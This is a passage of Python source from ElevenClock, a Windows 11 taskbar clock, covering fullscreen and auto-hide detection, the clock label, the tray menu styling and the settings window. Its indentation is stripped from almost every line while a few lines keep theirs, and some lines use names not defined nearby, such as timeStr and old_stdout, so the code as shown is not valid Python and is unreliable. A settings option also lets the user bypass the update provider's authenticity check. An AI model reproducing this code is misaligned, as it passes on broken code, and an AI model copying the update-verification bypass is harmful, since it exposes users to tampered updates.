print(hwnd, win32gui.GetWindowText(hwnd), self.full_screen_rect, win32gui.GetWindowRect(hwnd))
fullscreen = True
else:
if(win32gui.GetWindowText(hwnd) != ""):
print(hwnd, win32gui.GetWindowText(hwnd), self.full_screen_rect, win32gui.GetWindowRect(hwnd))
fullscreen = True
win32gui.EnumWindows(winEnumHandler, 0)
return fullscreen
except Exception as e:
raise e
def fivesecsloop(self):
EnableHideOnFullScreen = getSettings("EnableHideOnFullScreen")
DisableHideWithTaskbar = getSettings("DisableHideWithTaskbar")
EnableHideOnRDP = getSettings("EnableHideOnRDP")
clockOnFirstMon = getSettings("ForceClockOnFirstMonitor")
if clockOnFirstMon:
INTLOOPTIME = 15
else:
INTLOOPTIME = 2
while True:
isFullScreen = self.theresFullScreenWin(clockOnFirstMon)
for i in range(INTLOOPTIME):
if not(isFullScreen) or not(EnableHideOnFullScreen):
if self.autoHide and not(DisableHideWithTaskbar):
mousePos = getMousePos()
if (mousePos.y()+1 == self.screen.geometry().y()+self.screen.geometry().height()) and self.screen.geometry().x() < mousePos.x() and self.screen.geometry().x()+self.screen.geometry().width() > mousePos.x():
self.refresh.emit()
elif (mousePos.y() <= self.screen.geometry().y()+self.screen.geometry().height()-self.preferedHeight):
self.hideSignal.emit()
else:
if(self.isRDPRunning and EnableHideOnRDP):
self.hideSignal.emit()
else:
self.refresh.emit()
else:
self.hideSignal.emit()
time.sleep(0.1)
    def showCalendar(self):
        # Simulate Win+N, which toggles the Windows 11 notification/calendar flyout
        self.keyboard.press(Key.cmd)
        self.keyboard.press('n')
        self.keyboard.release('n')
        self.keyboard.release(Key.cmd)
def focusOutEvent(self, event: QFocusEvent) -> None:
self.refresh.emit()
def refreshandShow(self):
if(self.shouldBeVisible):
self.show()
self.setVisible(True)
self.raise_()
theme = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "SystemUsesLightTheme", 1)
if(theme != self.lastTheme):
if (theme == 0 or getSettings("ForceDarkTheme")) and not getSettings("ForceLightTheme"):
self.lastTheme = 0
self.label.setStyleSheet("padding: 1px;padding-right: 5px; color: white;")
self.label.bgopacity = 0.1
self.font.setWeight(QFont.Weight.Medium)
self.label.setFont(self.font)
else:
self.lastTheme = 1
self.label.setStyleSheet("padding: 1px;padding-right: 5px; color: black;")
self.label.bgopacity = .5
self.font.setWeight(QFont.Weight.Normal)
self.label.setFont(self.font)
self.label.setText(timeStr)
def closeEvent(self, event: QCloseEvent) -> None:
self.shouldBeVisible = False
print("close")
self.loop.kill()
self.loop2.kill()
event.accept()
return super().closeEvent(event)
def setToTheMiddle(self) -> None:
if getSettings("CenterAlignment"):
self.label.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.setFixedWidth(self.label.getTextUsedSpaceRect()+5)
if not(getSettings("EnableWin32API")):
print("Using qt's default positioning system")
self.move((self.preferedwidth-(self.label.getTextUsedSpaceRect()+5))+self.w, self.h)
self.resize(self.label.getTextUsedSpaceRect()+5, self.preferedHeight*self.dpiy)
else:
print("Using win32 API positioning system")
self.user32 = windll.user32
self.user32.SetProcessDPIAware() # optional, makes functions return real pixel numbers instead of scaled values
                win32gui.SetWindowPos(self.winId(), 0, int((self.preferedwidth-(self.label.getTextUsedSpaceRect()+5))+self.w), int(self.h), int(self.label.getTextUsedSpaceRect()+5), int(self.preferedHeight*self.dpiy), False)
print("Width hint:",self.label.getTextUsedSpaceRect()+5, self.pos())
old_stdout.write(buffer.getvalue())
old_stdout.flush()
class Label(QLabel):
clicked = Signal()
def __init__(self, text, parent):
super().__init__(text, parent=parent)
self.setMouseTracking(True)
self.backgroundwidget = QWidget(self)
self.color = "255, 255, 255"
self.bgopacity = 0.1
self.backgroundwidget.setStyleSheet(f"background-color: rgba({self.color}, 0);border-top: 1px solid rgba({self.color},0);")
self.backgroundwidget.show()
self.showBackground = QVariantAnimation()
self.showBackground.setStartValue(.001) # Not 0 to prevent white flashing on the border
self.showBackground.setEndValue(self.bgopacity)
self.showBackground.setDuration(100)
self.showBackground.setEasingCurve(QEasingCurve.InOutQuad) # Not strictly required, just for the aesthetics
self.showBackground.valueChanged.connect(lambda opacity: self.backgroundwidget.setStyleSheet(f"background-color: rgba({self.color}, {opacity/2});border-top: 1px solid rgba({self.color}, {opacity});"))
self.hideBackground = QVariantAnimation()
self.hideBackground.setStartValue(self.bgopacity)
self.hideBackground.setEndValue(.001) # Not 0 to prevent white flashing on the border
self.hideBackground.setDuration(100)
self.hideBackground.setEasingCurve(QEasingCurve.InOutQuad) # Not strictly required, just for the aesthetics
self.hideBackground.valueChanged.connect(lambda opacity: self.backgroundwidget.setStyleSheet(f"background-color: rgba({self.color}, {opacity/2});border-top: 1px solid rgba({self.color}, {opacity});"))
def enterEvent(self, event: QEvent) -> None:
        geometry = self.getTextUsedSpaceRect()  # despite the old QRect annotation, this is a pixel width, not a QRect
self.showBackground.setStartValue(.001)
self.showBackground.setEndValue(self.bgopacity) # Not 0 to prevent white flashing on the border
if(self.width() > geometry):
if(not(getSettings("ClockOnTheLeft"))):
self.backgroundwidget.move(self.width()-geometry, 0)
else:
self.backgroundwidget.move(0, 0)
self.backgroundwidget.resize(geometry, self.height())
else:
print("Background widget is bigger than parent!")
self.backgroundwidget.move(0, 0)
self.backgroundwidget.resize(geometry, self.height())
self.showBackground.start()
return super().enterEvent(event)
def leaveEvent(self, event: QEvent) -> None:
self.hideBackground.setStartValue(self.bgopacity)
self.hideBackground.setEndValue(.001) # Not 0 to prevent white flashing on the border
self.hideBackground.start()
return super().leaveEvent(event)
    def getTextUsedSpaceRect(self):
        text = self.text().strip()
        # Empirical width multipliers, tuned by the number of displayed lines
        if len(text.split("\n"))>=3:
            mult = 0.633333333333333333
        elif len(text.split("\n"))==2:
            mult = 1
        else:
            mult = 1.5
        return self.fontMetrics().boundingRect(text).width()*mult
def mousePressEvent(self, ev: QMouseEvent) -> None:
self.setWindowOpacity(0.7)
self.window().setWindowOpacity(0.7)
return super().mousePressEvent(ev)
def mouseReleaseEvent(self, ev: QMouseEvent) -> None:
self.setWindowOpacity(1)
self.window().setWindowOpacity(1)
if(ev.button() == Qt.RightButton):
mousePos = getMousePos()
print(i.contextMenu().height())
if(i.contextMenu().height() != 480):
mousePos.setY(self.window().y()-i.contextMenu().height())
else:
mousePos.setY(self.window().y()-int(220*(i.contextMenu().screen().logicalDotsPerInchX()/96)))
i.execMenu(mousePos)
else:
self.clicked.emit()
return super().mouseReleaseEvent(ev)
class Menu(QMenu):
def __init__(self, title: str):
self.setAttribute(Qt.WA_StyledBackground)
super().__init__(title)
class TaskbarIconTray(QSystemTrayIcon):
def __init__(self, app=None):
super().__init__(app)
self.setIcon(QIcon(os.path.join(realpath, "icon.ico")))
self.show()
menu = QMenu(_("ElevenClock"))
menu.setWindowFlag(Qt.WindowStaysOnTopHint)
menu.setWindowFlags(menu.windowFlags() | Qt.FramelessWindowHint)
menu.setAttribute(Qt.WA_TranslucentBackground)
menu.addSeparator()
self.settingsAction = QAction(_("ElevenClock Settings"), app)
self.settingsAction.triggered.connect(lambda: sw.show())
menu.addAction(self.settingsAction)
self.reloadAction = QAction(_("Reload Clocks"), app)
self.reloadAction.triggered.connect(lambda: restartClocks())
menu.addAction(self.reloadAction)
menu.addSeparator()
self.nameAction = QAction(_("ElevenClock v{0}").format(version), app)
self.nameAction.setEnabled(False)
menu.addAction(self.nameAction)
menu.addSeparator()
self.restartAction = QAction(_("Restart ElevenClock"), app)
self.restartAction.triggered.connect(lambda: os.startfile(sys.executable))
menu.addAction(self.restartAction)
self.hideAction = QAction(_("Hide ElevenClock"), app)
self.hideAction.triggered.connect(lambda: closeClocks())
menu.addAction(self.hideAction)
self.quitAction = QAction(_("Quit ElevenClock"), app)
self.quitAction.triggered.connect(lambda: app.quit())
menu.addAction(self.quitAction)
self.setContextMenu(menu)
def reloadClocksIfRequired(reason: QSystemTrayIcon.ActivationReason) -> None:
if(reason != QSystemTrayIcon.ActivationReason.Context):
restartClocks()
self.activated.connect(lambda r: reloadClocksIfRequired(r))
if(getSettings("DisableSystemTray")):
self.hide()
print("system tray icon disabled")
self.applyStyleSheet()
def execMenu(self, pos: QPoint):
self.applyStyleSheet()
self.contextMenu().exec_(pos)
def getPx(self, original) -> int:
return int(original*(self.contextMenu().screen().logicalDotsPerInchX()/96))
def applyStyleSheet(self) -> None:
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
self.settingsAction.setIcon(QIcon(getPath(f"settings_{self.iconMode}.png")))
self.reloadAction.setIcon(QIcon(getPath(f"clock_{self.iconMode}.png")))
self.nameAction.setIcon(QIcon(getPath(f"about_{self.iconMode}.png")))
self.restartAction.setIcon(QIcon(getPath(f"restart_{self.iconMode}.png")))
self.hideAction.setIcon(QIcon(getPath(f"hide_{self.iconMode}.png")))
self.quitAction.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.contextMenu().setStyleSheet(f"""
QWidget{{
background-color: transparent;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(60, 60, 60);
padding: {self.getPx(2)}px;
outline: 0px;
color: white;
background: #262626;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(60, 60, 60);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(255, 255, 255, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
""")
else:
self.iconMode = "black"
self.settingsAction.setIcon(QIcon(getPath(f"settings_{self.iconMode}.png")))
self.reloadAction.setIcon(QIcon(getPath(f"clock_{self.iconMode}.png")))
self.nameAction.setIcon(QIcon(getPath(f"about_{self.iconMode}.png")))
self.restartAction.setIcon(QIcon(getPath(f"restart_{self.iconMode}.png")))
self.hideAction.setIcon(QIcon(getPath(f"hide_{self.iconMode}.png")))
self.quitAction.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.contextMenu().setStyleSheet(f"""
QWidget{{
background-color: transparent;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(200, 200, 200);
padding: {self.getPx(2)}px;
outline: 0px;
color: black;
background: #eeeeee;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(200, 200, 200);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(0, 0, 0, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
""")
class QIconLabel(QWidget):
def __init__(self, text, icon=None):
super().__init__()
self.setObjectName("subtitleLabel")
self.label = QLabel(text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 13pt;background: none;font-family: \"Microsoft JhengHei UI\";")
else:
self.label.setStyleSheet("font-size: 13pt;background: none;font-family: \"Segoe UI Variable Display\";")
self.image = QLabel(self)
self.image.setPixmap(QIcon(icon).pixmap(QSize(24, 24)))
self.image.setStyleSheet("padding: 3px;background: none;")
self.setAttribute(Qt.WA_StyledBackground)
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def setIcon(self, icon: str) -> None:
self.image.setPixmap(QIcon(icon).pixmap(QSize(24, 24)))
def resizeEvent(self, event: QResizeEvent) -> None:
self.label.move(self.getPx(60), self.getPx(25))
self.label.setFixedHeight(self.getPx(30))
self.image.move(self.getPx(22), self.getPx(25))
self.image.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(70))
self.image.setFixedHeight(self.getPx(30))
self.label.setFixedWidth(self.width()-self.getPx(70))
self.image.setFixedWidth(self.getPx(30))
return super().resizeEvent(event)
class QSettingsButton(QWidget):
clicked = Signal()
def __init__(self, text="", btntext="", parent=None, h = 30):
super().__init__(parent)
self.fh = h
self.setAttribute(Qt.WA_StyledBackground)
self.button = QPushButton(btntext+" ", self)
self.button.setLayoutDirection(Qt.RightToLeft)
self.setObjectName("stBtn")
self.label = QLabel(text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.button.setStyleSheet("font-size: 10pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.label.setObjectName("StLbl")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.button.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
self.button.clicked.connect(self.clicked.emit)
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(170), self.getPx(10))
self.label.move(self.getPx(60), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(230))
self.label.setFixedHeight(self.getPx(self.fh))
self.setFixedHeight(self.getPx(50+(self.fh-30)))
self.button.setFixedHeight(self.getPx(self.fh))
self.button.setFixedWidth(self.getPx(150))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
self.button.setIcon(icon)
class QSettingsComboBox(QWidget):
textChanged = Signal(str)
def __init__(self, text="", btntext="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBox(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.setItemDelegate(QStyledItemDelegate(self.combobox))
self.setObjectName("stBtn")
self.restartButton = QPushButton("Restart ElevenClock", self)
self.restartButton.hide()
self.restartButton.setObjectName("AccentButton")
self.label = QLabel(text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def setItems(self, items: list, index: int) -> None:
self.combobox.addItems(items)
try:
self.combobox.setCurrentIndex(index)
except Exception as e:
print(e)
self.combobox.setCurrentIndex(0)
self.combobox.currentTextChanged.connect(self.textChanged.emit)
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(170), self.getPx(10))
self.label.move(self.getPx(60), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(380))
self.label.setFixedHeight(self.getPx(30))
self.restartButton.move(self.width()-self.getPx(330), self.getPx(10))
self.restartButton.setFixedWidth(self.getPx(150))
self.restartButton.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(150))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
pass
#self.button.setIcon(icon)
def showRestartButton(self) -> None:
self.restartButton.show()
class QSettingsCheckBox(QWidget):
stateChanged = Signal(bool)
def __init__(self, text="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.setObjectName("stChkBg")
self.checkbox = QCheckBox(text, self)
if lang == lang_zh_TW:
self.checkbox.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
self.checkbox.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.checkbox.setObjectName("stChk")
self.checkbox.stateChanged.connect(self.stateChanged.emit)
def setChecked(self, checked: bool) -> None:
self.checkbox.setChecked(checked)
def isChecked(self) -> bool:
return self.checkbox.isChecked()
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedHeight(self.getPx(30))
self.checkbox.setFixedWidth(self.width()-self.getPx(70))
self.setFixedHeight(self.getPx(50))
return super().resizeEvent(event)
class SettingsWindow(QScrollArea):
def __init__(self):
super().__init__()
layout = QVBoxLayout()
self.updateSize = True
self.setWidgetResizable(True)
self.resizewidget = QWidget()
self.resizewidget.setObjectName("background")
self.setWindowIcon(QIcon(os.path.join(realpath, "icon.ico")))
layout.addSpacing(10)
title = QLabel(_("ElevenClock Settings"))
title.setObjectName("title")
if lang == lang_zh_TW:
title.setStyleSheet("font-size: 25pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
title.setStyleSheet("font-size: 25pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
layout.addWidget(title)
layout.setSpacing(0)
layout.setContentsMargins(0, 0, 0, 0)
layout.addSpacing(10)
self.resize(900, 600)
layout.addSpacing(20)
self.setFrameShape(QFrame.NoFrame)
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
else:
self.iconMode = "black"
self.generalSettingsTitle = QIconLabel(_("General Settings:"), getPath(f"settings_{self.iconMode}.png"))
layout.addWidget(self.generalSettingsTitle)
        self.updateButton = QSettingsButton(_("<b>Update to the latest version!</b>"), _("Install update"))
self.updateButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.updateButton.clicked.connect(lambda: KillableThread(target=updateIfPossible, args=((True,))).start())
self.updateButton.hide()
layout.addWidget(self.updateButton)
self.selectedLanguage = QSettingsComboBox("ElevenClock's language", _("Change"))
self.selectedLanguage.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
try:
self.selectedLanguage.setItems(list(languageReference.values()), list(languageReference.keys()).index(langName))
except Exception as e:
print(e)
self.selectedLanguage.setItems(list(languageReference.values()), 0)
def changeLang(text):
keys = list(languageReference.keys())
values = list(languageReference.values())
for i in range(len(values)):
if(text == values[i]):
setSettingsValue("PreferredLanguage", str(keys[i]), r=False)
self.selectedLanguage.showRestartButton()
def restartElevenClockByLangChange():
subprocess.run(str("start /B \"\" \""+sys.executable)+"\" --settings", shell=True)
app.quit()
self.selectedLanguage.restartButton.clicked.connect(restartElevenClockByLangChange)
self.selectedLanguage.textChanged.connect(changeLang)
layout.addWidget(self.selectedLanguage)
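# Changing the combo box only persists the preference; the restart button then
# relaunches the executable with --settings so the new locale takes effect,
# since the language is resolved once at startup.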
self.updatesChBx = QSettingsCheckBox(_("Automatically check for updates"))
self.updatesChBx.setChecked(not(getSettings("DisableAutoCheckForUpdates")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableAutoCheckForUpdates", not(bool(i)), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Automatically install available updates"))
self.updatesChBx.setChecked(not(getSettings("DisableAutoInstallUpdates")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableAutoInstallUpdates", not(bool(i)), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Enable really silent updates"))
self.updatesChBx.setChecked((getSettings("EnableSilentUpdates")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableSilentUpdates", bool(i), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Bypass update provider authenticity check (NOT RECOMMENDED, AT YOUR OWN RISK)"))
self.updatesChBx.setChecked((getSettings("BypassDomainAuthCheck")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("BypassDomainAuthCheck", bool(i), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show ElevenClock on system tray"))
self.updatesChBx.setChecked(not(getSettings("DisableSystemTray")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableSystemTray", not(bool(i))))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Alternative clock alignment (may not work)"))
self.updatesChBx.setChecked((getSettings("EnableWin32API")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableWin32API", bool(i)))
layout.addWidget(self.updatesChBx)
self.startupButton = QSettingsButton(_("Change startup behaviour"), _("Change"))
self.startupButton.clicked.connect(lambda: os.startfile("ms-settings:startupapps"))
layout.addWidget(self.startupButton)
layout.addSpacing(10)
self.clockSettingsTitle = QIconLabel(_("Clock Settings:"), getPath(f"clock_{self.iconMode}.png"))
layout.addWidget(self.clockSettingsTitle)
self.updatesChBx = QSettingsCheckBox(_("Hide the clock in fullscreen mode"))
self.updatesChBx.setChecked((getSettings("EnableHideOnFullScreen")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableHideOnFullScreen", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Hide the clock when RDP Client or Citrix Workspace are running"))
self.updatesChBx.setChecked((getSettings("EnableHideOnRDP")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableHideOnRDP", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show the clock when the taskbar is set to hide automatically"))
self.updatesChBx.setChecked((getSettings("DisableHideWithTaskbar")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableHideWithTaskbar", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Force the clock to be at the bottom of the screen"))
self.updatesChBx.setChecked((getSettings("ForceOnBottom")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ForceOnBottom", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show the clock at the left of the screen"))
self.updatesChBx.setChecked((getSettings("ClockOnTheLeft")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ClockOnTheLeft", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show the clock on the primary screen (Useful if clock is set on the left)"))
self.updatesChBx.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.updatesChBx.setChecked((getSettings("ForceClockOnFirstMonitor")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ForceClockOnFirstMonitor", bool(i)))
layout.addWidget(self.updatesChBx)
layout.addSpacing(10)
self.clockAppearanceTitle = QIconLabel(_("Clock Appearance:"), getPath(f"appearance_{self.iconMode}.png"))
layout.addWidget(self.clockAppearanceTitle)
self.updatesChBx = QSettingsCheckBox(_("Fix the hyphen/dash showing over the month"))
self.updatesChBx.setChecked((getSettings("EnableHyphenFix")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableHyphenFix", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Force the clock to have black text"))
self.updatesChBx.setChecked((getSettings("ForceLightTheme")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ForceLightTheme", bool(i)))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Force the clock to have white text")+_(" - It is required that the Dark Text checkbox is disabled"))
self.updatesChBx.setChecked((getSettings("ForceDarkTheme")))
self.updatesChBx.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.updatesChBx.stateChanged.connect(lambda i: setSettings("ForceDarkTheme", bool(i)))
layout.addWidget(self.updatesChBx)
#self.updatesChBx = QSettingsCheckBox(_("Align the clock text to the center"))
#self.updatesChBx.setChecked((getSettings("CenterAlignment")))
#self.updatesChBx.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
#self.updatesChBx.stateChanged.connect(lambda i: setSettings("CenterAlignment", bool(i)))
#layout.addWidget(self.updatesChBx)
layout.addSpacing(10)
self.dateTimeTitle = QIconLabel(_("Date & Time Settings:"), getPath(f"datetime_{self.iconMode}.png"))
layout.addWidget(self.dateTimeTitle)
self.updatesChBx = QSettingsCheckBox(_("Show seconds on the clock"))
self.updatesChBx.setChecked((getSettings("EnableSeconds")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableSeconds", bool(i), r = False))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show date on the clock"))
self.updatesChBx.setChecked(not(getSettings("DisableDate")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableDate", not(bool(i))))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show time on the clock"))
self.updatesChBx.setChecked(not(getSettings("DisableTime")))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("DisableTime", not(bool(i))))
layout.addWidget(self.updatesChBx)
self.updatesChBx = QSettingsCheckBox(_("Show weekday on the clock"))
self.updatesChBx.setChecked(getSettings("EnableWeekDay"))
self.updatesChBx.stateChanged.connect(lambda i: setSettings("EnableWeekDay", bool(i)))
layout.addWidget(self.updatesChBx)
self.RegionButton = QSettingsButton(_("Change date and time format (Regional settings)"), _("Regional settings"))
self.RegionButton.clicked.connect(lambda: os.startfile("intl.cpl"))
layout.addWidget(self.RegionButton)
layout.addSpacing(10)
self.languageSettingsTitle = QIconLabel(_("About the language pack:"), getPath(f"lang_{self.iconMode}.png"))
layout.addWidget(self.languageSettingsTitle)
self.PackInfoButton = QSettingsButton(_("Translated to English by martinet101"), "")
self.PackInfoButton.button.hide()
self.PackInfoButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.PackInfoButton)
self.openTranslateButton = QSettingsButton(_("Translate ElevenClock to your language"), _("Get started"))
self.openTranslateButton.clicked.connect(lambda: self.hide())
layout.addWidget(self.openTranslateButton)
layout.addSpacing(10)
self.aboutTitle = QIconLabel(_("About ElevenClock version {0}:").format(version), getPath(f"about_{self.iconMode}.png"))
layout.addWidget(self.aboutTitle)
self.WebPageButton = QSettingsButton(_("View ElevenClock's homepage"), _("Open"))
self.WebPageButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/"))
self.WebPageButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.WebPageButton)
self.IssueButton = QSettingsButton(_("Report an issue/request a feature"), _("Report"))
self.IssueButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/issues/new/choose"))
self.IssueButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.IssueButton)
self.CofeeButton = QSettingsButton(_("Support the dev: Give me a coffee☕"), _("Open page"))
self.CofeeButton.clicked.connect(lambda: os.startfile("https://ko-fi.com/martinet101"))
self.CofeeButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.CofeeButton)
self.PichonButton = QSettingsButton(_("Icons by Icons8"), _("Webpage"))
self.PichonButton.clicked.connect(lambda: os.startfile("https://icons8.com/"))
self.PichonButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.PichonButton)
self.closeButton = QSettingsButton(_("Close settings"), _("Close"))
self.closeButton.clicked.connect(lambda: self.hide())
layout.addWidget(self.closeButton)
layout.addSpacing(10)
self.debbuggingTitle = QIconLabel(_("Debugging information:"), getPath(f"bug_{self.iconMode}.png"))
layout.addWidget(self.debbuggingTitle)
self.logButton = QSettingsButton(_("Open ElevenClock's log"), _("Open"))
self.logButton.clicked.connect(lambda: self.showDebugInfo())
self.logButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.logButton)
